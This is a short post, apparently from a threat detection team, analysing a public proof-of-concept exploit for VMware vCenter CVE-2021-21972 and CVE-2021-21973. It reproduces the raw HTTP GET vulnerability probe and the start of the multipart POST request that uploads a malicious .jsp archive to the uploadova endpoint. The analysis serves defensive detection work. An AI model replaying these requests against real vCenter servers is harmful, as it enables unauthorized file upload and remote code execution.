The Idappcom Threat Detection Team has been working on the recent VMware vCenter 6.5 / 7.0 Remote Code Execution exploits.
These are identified as:
· CVE-2021-21972 – Unauthorized File Upload leading to remote code execution
· CVE-2021-21973 – Unauthorized Server-side Request Forgery
I was able to find a proof of concept script written in python and set about delving into the code to understand how the exploit works.
This was an interesting one to solve because the script first of all looks for a vulnerable target and only if it gets the right response it will carry out the next stage. I had to modify the code to make it think that it had the correct response, this was made easier as the script had several code comments which helped. Once it has checked the target it then goes on to perform an attempt at uploading a .tar file which in this example is an archive of a malicious .jsp file.
This GET request performs a check to see if the target is vulnerable:
GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: vSphereClient.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
This POST request attempts to upload a malicious file.
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: vSphereClient.local
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3223
Content-Type: multipart/form-data; boundary=305be0a4775f442bad1b3a58ea9f3a99
--305be0a4775f442bad1b3a58ea9f3a99
Content-Disposition: form-data; name="uploadFile"; filename="Linux.tar"
References:
https://github.com/NS-Sp4ce
https://swarm.ptsecurity.com/unauth-rce-vmware/